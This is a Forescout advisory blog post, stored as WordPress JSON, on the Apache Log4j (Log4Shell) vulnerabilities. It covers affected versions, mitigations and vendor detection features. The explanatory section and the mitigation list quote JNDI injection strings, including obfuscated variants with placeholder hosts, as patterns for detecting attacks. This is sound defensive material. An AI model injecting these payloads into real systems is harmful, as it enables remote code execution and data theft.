{"id":69985,"date":"2021-12-12T18:19:35","date_gmt":"2021-12-13T02:19:35","guid":{"rendered":"https:\/\/forescoutstage.wpengine.com\/?p=69985"},"modified":"2021-12-29T15:29:01","modified_gmt":"2021-12-29T23:29:01","slug":"forescout%e2%80%99s-response-to-cve-2021-44228-apache-log4j-2","status":"publish","type":"post","link":"https:\/\/www.forescout.com\/blog\/forescout%e2%80%99s-response-to-cve-2021-44228-apache-log4j-2\/","title":{"rendered":"Forescout\u2019s Response to Apache Log4j Vulnerabilities"},"content":{"rendered":"<p><strong>Update as of December 29, 2021:<\/strong><\/p>\n<p>On December 28, 2021, Apache disclosed a new vulnerability (CVE-2021-44832). This is a medium severity vulnerability (CVSS score: 6.6) that allows for remote code execution (RCE) in Apache Log4j2 versions 2.0-beta7 through 2.17.0, excluding security fix releases 2.3.2 and 2.12.4. Apache released Log4j2 versions 2.17.1, 2.12.4, and 2.3.2 to patch the vulnerability and resolve the issue.<\/p>\n<p>For the latest information on how to update your Forescout products, please refer to\u00a0<a href=\"https:\/\/forescout.force.com\/support\/s\/article\/Important-security-information-related-to-Apache-Log4j-utility-CVE-2021-44228\">KB Article #12049<\/a> on our portal.<\/p>\n<p>For more information: Apache CVE: <a href=\"https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2021-44832\">CVE-2021-44832<\/a><\/p>\n<p>On December 9, 2021, Apache published a zero-day vulnerability\u00a0<a href=\"https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=2021-44228\">(CVE-2021-44228)<\/a>\u00a0for Apache Log4j being referred to as \u201cLog4Shell\u201d. This \u201ccritical\u201d vulnerability (CVSS score: 10) allows a remote attacker to take control of an affected system. When exploited, this vulnerability allows an attacker to run arbitrary code on the device, giving full control over to the attacker. Any device exploited should be considered compromised, potentially along with any devices that trusted the compromised device. The vulnerability has been actively exploited.<\/p>\n<p>On December 14, 2021, Apache confirmed another vulnerability that was identified impacting Apache Log4j utility (CVE-2021-45046). According to reports, this flaw (CVSS score: 9) could result in remote code execution, which stemmed from an &#8220;incomplete&#8221; fix for\u00a0<a href=\"https:\/\/thehackernews.com\/2021\/12\/extremely-critical-log4j-vulnerability.html\">CVE-2021-44228<\/a>. Vulnerability CVE-2021-45046 has been actively exploited.<\/p>\n<p>On December 18, 2021, a third vulnerability was identified. Tracked as\u00a0CVE-2021-45105\u00a0(CVSS score: 7.5), the high severity Denial of Service (DoS) vulnerability affects all versions of the tool from 2.0-beta9 to 2.16.0.<\/p>\n<p>For additional details about these vulnerabilities, affected versions and solutions, please reference the\u00a0<a href=\"https:\/\/protect-us.mimecast.com\/s\/5uZVCkRV3phqqKgZH23q2N?domain=logging.apache.org\">Apache Logging Services alert<\/a>.<\/p>\n<h2>Impact on Forescout Products and Services<\/h2>\n<p>Forescout\u2019s security team immediately commenced an investigation of its networks and has found no evidence of compromise at this time. Forescout has updated rules and signatures of Forescout\u2019s security solutions to detect and block any attempt to exploit our platforms and keep our defenders on high alert. In addition, Forescout has identified potentially vulnerable services and is in the process of patching them.<\/p>\n<p>Forescout has identified the affected products and components and is in the process of releasing updates for the customers. For the latest information on how to update your Forescout products, please refer to\u00a0<a href=\"https:\/\/forescout.force.com\/support\/s\/article\/Important-security-information-related-to-Apache-Log4j-utility-CVE-2021-44228\">KB Article #12049<\/a> on our portal.<\/p>\n<h2>Why are these Vulnerabilities Challenging?<\/h2>\n<p>Log4j is a logging library present in many Java applications and the vulnerabilities are a consequence of how Log4j processes log messages.<\/p>\n<p>It allows the use of \u201clookup\u201d features, where the user providing messages to be logged can specify variables that will be \u201clooked up\u201d via Log4j and appended into the message. Instead of a simple string, for instance, it can be a system or environment variable, or a call to a remote server. That allows attackers to inject calls to malicious servers that hosts malware or an instruction to leak sensitive information (such as access tokens) to attacker-controlled servers.<\/p>\n<p>These remote calls are enabled by a Java feature called Java Naming and Directory Interface (JNDI), which supports protocols such as the Lightweight Directory Access Protocol (LDAP), Domain Name System (DNS), Remote Method Invocation (RMI), and Common Object Request Broker Architecture (CORBA). Technically, an exploit is a string of the form ${jndi:&lt;service&gt;:&lt;malicious_server&gt;} that must be injected by an attacker into a vulnerable log4j instance.<\/p>\n<p>Many Internet-facing machines, such as web servers, accept user input that is logged by a backend running Log4j without sanitization. That happens often even if the webserver itself does not run Log4j, but some business application uses information coming from the user via the webserver. This allows attackers to inject the malicious strings via HTTP requests, for instance, which is the biggest attack surface observed so far.<\/p>\n<p>There are three complicating factors for this vulnerability. First, Log4j is not a single vulnerable application but a <a href=\"https:\/\/gist.github.com\/SwitHak\/b66db3a06c2955a9cb71a8718970c592\">widely-used component<\/a>, present in products ranging from <a href=\"https:\/\/github.com\/apache\/druid\/pull\/12051\">databases<\/a> to <a href=\"https:\/\/tools.cisco.com\/security\/center\/content\/CiscoSecurityAdvisory\/cisco-sa-apache-log4j-qRuKNEbd\">web conferencing systems<\/a>. <strong>Therefore, identifying vulnerable assets in a network is challenging<\/strong>. Second, attackers have quickly found many ways to obfuscate exploits, so that <strong>understanding if and how your organization is or was attacked is not easy<\/strong>. For instance, one valid exploit is ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}:\/\/&lt;malicious_server&gt;} which is not easy to immediately match to the ${jndi:&lt;service&gt;:&lt;malicious_server&gt;} template we mentioned above.<\/p>\n<p>The third complication lies in an incomplete fix for CVE-2021-44228. There have been two new vulnerabilities discovered: CVE-2021-45046 and CVE-2021-45105.<\/p>\n<p>While the fix for CVE-2021-44228 disables JNDI for log messages, the variables used in the Log4j configuration files still could be expanded to JNDI lookups. Initially CVE-2021-45046 had a low CVSS score of 3.7 since it has been believed that the impact of this vulnerability is at most Denial-of-Service, and that the attackers must be able to control the configuration files. However, on some systems (MacOS at the time of this writing) researchers have discovered <a href=\"https:\/\/www.lunasec.io\/docs\/blog\/log4j-zero-day-severity-of-cve-2021-45046-increased\/\">a bypass<\/a> that allows to achieve full Remote Code Execution.<\/p>\n<p>We have already hinted about the last of the discovered vulnerabilities CVE-2021-45105 in <a href=\"https:\/\/github.com\/Forescout\/log4j_response\">Forescout Research Labs technical blog<\/a>. This vulnerability allows attackers to achieve Denial-of-Service on certain systems by adding specially crafted log variables that lead to infinite recursions and will cause stack overflows.<\/p>\n<p>The root cause of all these three vulnerabilities is not only the fact that JNDI lookups were allowed without restriction, but chiefly because the variable parsing functionality is flawed. Thus, all three patches are mending the same fundamental issue. Yet, it may still be possible that researchers or attackers will soon discover new ways of circumventing these patches as well.<strong> It is therefore imperative to update your system to the latest patch available as soon as that patch gets out<\/strong>.<\/p>\n<p>Refer to <a href=\"https:\/\/github.com\/Forescout\/log4j_response\">our technical blog<\/a> for more insights on detecting vulnerable systems and exploitation attempts.<\/p>\n<h2>Protecting Your Network \u2013 Mitigations<\/h2>\n<h3>Identify Vulnerable Devices<\/h3>\n<p><strong>Vulnerable software\/devices can be identified by:<\/strong><\/p>\n<ul>\n<li>Matching asset inventories with vendor advisories. See <a href=\"https:\/\/gist.github.com\/SwitHak\/b66db3a06c2955a9cb71a8718970c592\">here<\/a> and <a href=\"https:\/\/www.techsolvency.com\/story-so-far\/cve-2021-44228-log4j-log4shell\/#who-affected\">here<\/a> for a list of affected vendors.<\/li>\n<li>Analyzing software bill of materials (SBOM) manifests \u2013 which are still very rare \u2013 or software build pipeline dependency manifests \u2013 which are common in environments such as Maven \u2013 to identify the use of the vulnerable component.<\/li>\n<li>Searching the file systems of machines to identify class files, especially the JndiLookup.class which is used to access the remote services.<\/li>\n<li>Analyzing log files to identify entries coming from log4j and map them back to applications.<\/li>\n<\/ul>\n<h3>Patch or Change Configurations<\/h3>\n<p>After vulnerable devices have been identified, Forescout recommends applying the latest security updates from Apache. Apache has released a new version of Log4j, version 2.17.0, to address the vulnerabilities.<\/p>\n<ul>\n<li>Apache CVE:\u00a0<a href=\"https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=2021-44228\">CVE-2021-44228<\/a><\/li>\n<li>Apache CVE: <a href=\"https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2021-45046\">CVE-2021-45046<\/a><\/li>\n<li>Apache CVE: <a href=\"https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2021-45105\">CVE-2021-45105<\/a><\/li>\n<li>Apache security advisory:\u00a0<a href=\"https:\/\/logging.apache.org\/log4j\/2.x\/security.html\">Apache Log4j Security Vulnerabilities<\/a><\/li>\n<\/ul>\n<p><strong>Mitigation Risk on the Network:<\/strong><\/p>\n<p>If sensitive devices are identified that cannot be immediately patched (e.g., a patch is not available), Forescout recommends mitigating the risk as follows.<\/p>\n<ul>\n<li>Use application tagging to identify those applications which you haven\u2019t validated as patched and apply strict policies to them.<\/li>\n<li>Configure a firewall to allow outgoing traffic to a trusted whitelist of addresses and protocols, thus preventing attackers from communicating outside of the network.<\/li>\n<li>Carefully monitor for failed logins and token anomalies.<\/li>\n<li>Detect exploitation attempts by inspecting log files for the characteristic URL patterns. As mentioned above, attackers are currently using obfuscating techniques to avoid detection. A non-exhaustive <a href=\"https:\/\/github.com\/tangxiaofeng7\/CVE-2021-44228-Apache-Log4j-Rce\">list of exploit patterns<\/a>that might help with detection includes:\n<ul>\n<li>${jndi:ldap:\/\/&lt;ip_address&gt;}<\/li>\n<li>${jndi:ldaps:\/\/&lt;ip_address&gt;}<\/li>\n<li>${jndi:rmi:\/\/&lt;ip_address&gt;}<\/li>\n<li>${${::-j}ndi:rmi:\/\/&lt;ip_address&gt;}<\/li>\n<li>${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}:\/\/&lt;ip_address&gt;}<\/li>\n<li>${${lower:jndi}:${lower:rmi}:\/\/&lt;ip_address&gt;}<\/li>\n<li>${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}:\/\/&lt;ip_address&gt;}<\/li>\n<li>${jndi:dns:\/\/&lt;ip_addess&gt;}<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<h3>Investigate Targeted Devices<\/h3>\n<p>If a device was the target of an exploit found by monitoring the network as described above, you can further investigate the incident by checking the logs for strings starting with \u201c${jndi\u201d or any of the exploit patterns above (there are grep <a href=\"https:\/\/gist.github.com\/Neo23x0\/e4c8b03ff8cdf1fa63b7d15db6e3860b\">regular expressions<\/a> to help with that).<\/p>\n<p>Once you have determined the device was actually compromised, proper containment, eradication and recovery processes should be taken, which include disconnecting the device, removing malware or malicious artifacts that have been dropped and determining when the system can be returned to production.<\/p>\n<h2>How Forescout Can Help Mitigate Log4shell<\/h2>\n<div>\n<p>Forescout R&amp;D Teams have developed the following artifacts to help mitigate Log4Shell:<\/p>\n<\/div>\n<h3>Assess Your Risk: Finding Vulnerable Devices<\/h3>\n<p>eyeSight customers can install the <a href=\"https:\/\/docs.forescout.com\/bundle\/spt-content-h\/page\/spt-content-h.About-Security-Policy-Templates.html\">Security Policy Templates (SPT)<\/a> plugin version 21.0.11. The SPT allows to scan Windows and Linux hosts to identify which of those run applications that use the vulnerable Log4j library.<\/p>\n<p>The SPT enumerates all Java Archive (JAR) files \u2013 packaged Java applications and libraries &#8211; on a scanned host and searches for the JndiLookup class on the found JAR files. When the class is found, it searches for version information available on build manifests (e.g., Maven properties.pom), file names (e.g., log4j-core-2.1.10), file hashes or even timestamps to try to determine whether the application is vulnerable or not.<\/p>\n<p>Scanned hosts are grouped into Vulnerable, Potentially Vulnerable, Not Affected and Unknown.<\/p>\n<p>We also intend future versions of the SPT to further help with forensic capabilities by scanning known log files for exploit patterns. Notice this will not be part of the first SPT release.<\/p>\n<p>It is paramount to identify vulnerable and violated hosts. eyeInspect customers can leverage the richness of data collected and the analytical capabilities of the tool to investigate the network behaviors. Special attention should be given to egress traffic related to protocols like LDAP, DNS, and RMI. It is possible to build easily multiple analytical dashboards to assess the traffic and device behaviors.<\/p>\n<p>These powerful logging and analysis capabilities are precious also to identify exploits happened while there was no threat detection: with eyeInspect it is easy to identify hosts that started using uncommon protocols or with suspicious behaviors, e.g. a node which started communicating yesterday through LDAP with an unknown server on the Internet.<\/p>\n<h3>Identify Attacks: Detecting Ongoing Exploits<\/h3>\n<p>eyeInspect customers can update their Threat Detection Add-Ons script to version v.1.6 containing a detection strategy for CVE-2021-44228 exploitation attempts on HTTP. This is supported from eyeInspect 4.2.0 onwards. Figure 1 shows an example of an alert raised when an exploit is detected.<\/p>\n<p>There is also a flash update of the OT Vulnerability &amp; IoC Database to help detection of IoCs related to CVE-2021-44228. Some Log4Shell callbacks are reported to run over Tor; eyeInspect has a large list of Tor exit node IP addresses (6700, very recently updated). This update adds additional IP addresses reported as malicious on various sources and this list could have updates in the next days.<\/p>\n<p>These Add-On tools will help you detect exploit attempts of the log4j vulnerability and identify indicators of already infected systems attempting to reach out to malicious IP addresses\u00a0identified by various threat intel sources.<\/p>\n<h3>Protect Your Organization: Segmenting the Network<\/h3>\n<p>eyeSegment customers can setup their systems to whitelist LDAP, DNS, and RMI traffic, which are being exploited in the wild, to only legitimate servers.<\/p>\n<p>eyeSight can also help to isolate devices that are known to be vulnerable but cannot be patched by placing them in specific VLANs.<\/p>\n<p>While it\u2019s not possible to block OT networks in general, customers could set rules in the eyeInspect anomaly detection engine to raise alerts if LDAP, RMI or other sensitive protocols are used against non whitelisted destinations.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Update as of December 29, 2021: On December 28, 2021, Apache disclosed a new vulnerability (CVE-2021-44832). This is a medium severity vulnerability (CVSS score: 6.6) that allows for remote code execution (RCE) in Apache Log4j2 versions 2.0-beta7 through 2.17.0, excluding security fix releases 2.3.2 and 2.12.4. Apache released Log4j2 versions 2.17.1, 2.12.4, and 2.3.2 to [&hellip;]<\/p>\n","protected":false},"author":124,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"ep_exclude_from_search":false,"footnotes":"","_links_to":"","_links_to_target":""},"categories":[562],"tags":[],"coauthors":[542],"class_list":["post-69985","post","type-post","status-publish","format-standard","hentry","category-news-and-views"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.8 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Forescout\u2019s Response to Apache Log4j Vulnerabilities - Forescout<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.forescout.com\/blog\/forescout\u2019s-response-to-cve-2021-44228-apache-log4j-2\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Forescout\u2019s Response to Apache Log4j Vulnerabilities - Forescout\" \/>\n<meta property=\"og:description\" content=\"Update as of December 29, 2021: On December 28, 2021, Apache disclosed a new vulnerability (CVE-2021-44832). This is a medium severity vulnerability (CVSS score: 6.6) that allows for remote code execution (RCE) in Apache Log4j2 versions 2.0-beta7 through 2.17.0, excluding security fix releases 2.3.2 and 2.12.4. Apache released Log4j2 versions 2.17.1, 2.12.4, and 2.3.2 to [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.forescout.com\/blog\/forescout\u2019s-response-to-cve-2021-44228-apache-log4j-2\/\" \/>\n<meta property=\"og:site_name\" content=\"Forescout\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/ForescoutTechnologies\" \/>\n<meta property=\"article:published_time\" content=\"2021-12-13T02:19:35+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2021-12-29T23:29:01+00:00\" \/>\n<meta name=\"author\" content=\"Forescout Research - Vedere Labs\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@Forescout\" \/>\n<meta name=\"twitter:site\" content=\"@Forescout\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"8 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.forescout.com\/blog\/forescout%e2%80%99s-response-to-cve-2021-44228-apache-log4j-2\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.forescout.com\/blog\/forescout%e2%80%99s-response-to-cve-2021-44228-apache-log4j-2\/\"},\"author\":{\"name\":\"Forescout Research - Vedere Labs\",\"@id\":\"https:\/\/www.forescout.com\/#\/schema\/person\/038ef2eda17d37f87d9978fa703ee984\"},\"headline\":\"Forescout\u2019s Response to Apache Log4j Vulnerabilities\",\"datePublished\":\"2021-12-13T02:19:35+00:00\",\"dateModified\":\"2021-12-29T23:29:01+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.forescout.com\/blog\/forescout%e2%80%99s-response-to-cve-2021-44228-apache-log4j-2\/\"},\"wordCount\":1933,\"publisher\":{\"@id\":\"https:\/\/www.forescout.com\/#organization\"},\"articleSection\":[\"News &amp; Views\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.forescout.com\/blog\/forescout%e2%80%99s-response-to-cve-2021-44228-apache-log4j-2\/\",\"url\":\"https:\/\/www.forescout.com\/blog\/forescout%e2%80%99s-response-to-cve-2021-44228-apache-log4j-2\/\",\"name\":\"Forescout\u2019s Response to Apache Log4j Vulnerabilities - Forescout\",\"isPartOf\":{\"@id\":\"https:\/\/www.forescout.com\/#website\"},\"datePublished\":\"2021-12-13T02:19:35+00:00\",\"dateModified\":\"2021-12-29T23:29:01+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/www.forescout.com\/blog\/forescout%e2%80%99s-response-to-cve-2021-44228-apache-log4j-2\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.forescout.com\/blog\/forescout%e2%80%99s-response-to-cve-2021-44228-apache-log4j-2\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.forescout.com\/blog\/forescout%e2%80%99s-response-to-cve-2021-44228-apache-log4j-2\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.forescout.com\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Forescout\u2019s Response to Apache Log4j Vulnerabilities\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.forescout.com\/#website\",\"url\":\"https:\/\/www.forescout.com\/\",\"name\":\"Forescout\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\/\/www.forescout.com\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.forescout.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.forescout.com\/#organization\",\"name\":\"Forescout Technologies, Inc.\",\"url\":\"https:\/\/www.forescout.com\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.forescout.com\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.forescout.com\/wp-content\/uploads\/2019\/01\/forescout-logo.svg\",\"contentUrl\":\"https:\/\/www.forescout.com\/wp-content\/uploads\/2019\/01\/forescout-logo.svg\",\"width\":1,\"height\":1,\"caption\":\"Forescout Technologies, Inc.\"},\"image\":{\"@id\":\"https:\/\/www.forescout.com\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/ForescoutTechnologies\",\"https:\/\/x.com\/Forescout\",\"https:\/\/www.instagram.com\/forescouttechnologies\/\",\"https:\/\/www.linkedin.com\/company\/forescout-technologies\",\"https:\/\/www.youtube.com\/user\/forescout1\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.forescout.com\/#\/schema\/person\/038ef2eda17d37f87d9978fa703ee984\",\"name\":\"Forescout Research - Vedere Labs\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.forescout.com\/#\/schema\/person\/image\/b4c8db5600adef8fa1a89cc86e15c781\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/6f43608a91eb86cde1564e21650235d0ed570d1ae0fbd371a265636ed603e70d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/6f43608a91eb86cde1564e21650235d0ed570d1ae0fbd371a265636ed603e70d?s=96&d=mm&r=g\",\"caption\":\"Forescout Research - Vedere Labs\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Forescout\u2019s Response to Apache Log4j Vulnerabilities - Forescout","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.forescout.com\/blog\/forescout\u2019s-response-to-cve-2021-44228-apache-log4j-2\/","og_locale":"en_US","og_type":"article","og_title":"Forescout\u2019s Response to Apache Log4j Vulnerabilities - Forescout","og_description":"Update as of December 29, 2021: On December 28, 2021, Apache disclosed a new vulnerability (CVE-2021-44832). This is a medium severity vulnerability (CVSS score: 6.6) that allows for remote code execution (RCE) in Apache Log4j2 versions 2.0-beta7 through 2.17.0, excluding security fix releases 2.3.2 and 2.12.4. Apache released Log4j2 versions 2.17.1, 2.12.4, and 2.3.2 to [&hellip;]","og_url":"https:\/\/www.forescout.com\/blog\/forescout\u2019s-response-to-cve-2021-44228-apache-log4j-2\/","og_site_name":"Forescout","article_publisher":"https:\/\/www.facebook.com\/ForescoutTechnologies","article_published_time":"2021-12-13T02:19:35+00:00","article_modified_time":"2021-12-29T23:29:01+00:00","author":"Forescout Research - Vedere Labs","twitter_card":"summary_large_image","twitter_creator":"@Forescout","twitter_site":"@Forescout","twitter_misc":{"Est. reading time":"8 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.forescout.com\/blog\/forescout%e2%80%99s-response-to-cve-2021-44228-apache-log4j-2\/#article","isPartOf":{"@id":"https:\/\/www.forescout.com\/blog\/forescout%e2%80%99s-response-to-cve-2021-44228-apache-log4j-2\/"},"author":{"name":"Forescout Research - Vedere Labs","@id":"https:\/\/www.forescout.com\/#\/schema\/person\/038ef2eda17d37f87d9978fa703ee984"},"headline":"Forescout\u2019s Response to Apache Log4j Vulnerabilities","datePublished":"2021-12-13T02:19:35+00:00","dateModified":"2021-12-29T23:29:01+00:00","mainEntityOfPage":{"@id":"https:\/\/www.forescout.com\/blog\/forescout%e2%80%99s-response-to-cve-2021-44228-apache-log4j-2\/"},"wordCount":1933,"publisher":{"@id":"https:\/\/www.forescout.com\/#organization"},"articleSection":["News &amp; Views"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.forescout.com\/blog\/forescout%e2%80%99s-response-to-cve-2021-44228-apache-log4j-2\/","url":"https:\/\/www.forescout.com\/blog\/forescout%e2%80%99s-response-to-cve-2021-44228-apache-log4j-2\/","name":"Forescout\u2019s Response to Apache Log4j Vulnerabilities - Forescout","isPartOf":{"@id":"https:\/\/www.forescout.com\/#website"},"datePublished":"2021-12-13T02:19:35+00:00","dateModified":"2021-12-29T23:29:01+00:00","breadcrumb":{"@id":"https:\/\/www.forescout.com\/blog\/forescout%e2%80%99s-response-to-cve-2021-44228-apache-log4j-2\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.forescout.com\/blog\/forescout%e2%80%99s-response-to-cve-2021-44228-apache-log4j-2\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.forescout.com\/blog\/forescout%e2%80%99s-response-to-cve-2021-44228-apache-log4j-2\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.forescout.com\/"},{"@type":"ListItem","position":2,"name":"Forescout\u2019s Response to Apache Log4j Vulnerabilities"}]},{"@type":"WebSite","@id":"https:\/\/www.forescout.com\/#website","url":"https:\/\/www.forescout.com\/","name":"Forescout","description":"","publisher":{"@id":"https:\/\/www.forescout.com\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.forescout.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.forescout.com\/#organization","name":"Forescout Technologies, Inc.","url":"https:\/\/www.forescout.com\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.forescout.com\/#\/schema\/logo\/image\/","url":"https:\/\/www.forescout.com\/wp-content\/uploads\/2019\/01\/forescout-logo.svg","contentUrl":"https:\/\/www.forescout.com\/wp-content\/uploads\/2019\/01\/forescout-logo.svg","width":1,"height":1,"caption":"Forescout Technologies, Inc."},"image":{"@id":"https:\/\/www.forescout.com\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/ForescoutTechnologies","https:\/\/x.com\/Forescout","https:\/\/www.instagram.com\/forescouttechnologies\/","https:\/\/www.linkedin.com\/company\/forescout-technologies","https:\/\/www.youtube.com\/user\/forescout1"]},{"@type":"Person","@id":"https:\/\/www.forescout.com\/#\/schema\/person\/038ef2eda17d37f87d9978fa703ee984","name":"Forescout Research - Vedere Labs","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.forescout.com\/#\/schema\/person\/image\/b4c8db5600adef8fa1a89cc86e15c781","url":"https:\/\/secure.gravatar.com\/avatar\/6f43608a91eb86cde1564e21650235d0ed570d1ae0fbd371a265636ed603e70d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/6f43608a91eb86cde1564e21650235d0ed570d1ae0fbd371a265636ed603e70d?s=96&d=mm&r=g","caption":"Forescout Research - Vedere Labs"}}]}},"featured_media_url":false,"is_file":false,"excerpt_manually_set":false,"_links":{"self":[{"href":"https:\/\/www.forescout.com\/wp-json\/wp\/v2\/posts\/69985","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.forescout.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.forescout.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.forescout.com\/wp-json\/wp\/v2\/users\/124"}],"replies":[{"embeddable":true,"href":"https:\/\/www.forescout.com\/wp-json\/wp\/v2\/comments?post=69985"}],"version-history":[{"count":0,"href":"https:\/\/www.forescout.com\/wp-json\/wp\/v2\/posts\/69985\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.forescout.com\/wp-json\/wp\/v2\/media?parent=69985"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.forescout.com\/wp-json\/wp\/v2\/categories?post=69985"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.forescout.com\/wp-json\/wp\/v2\/tags?post=69985"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/www.forescout.com\/wp-json\/wp\/v2\/coauthors?post=69985"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}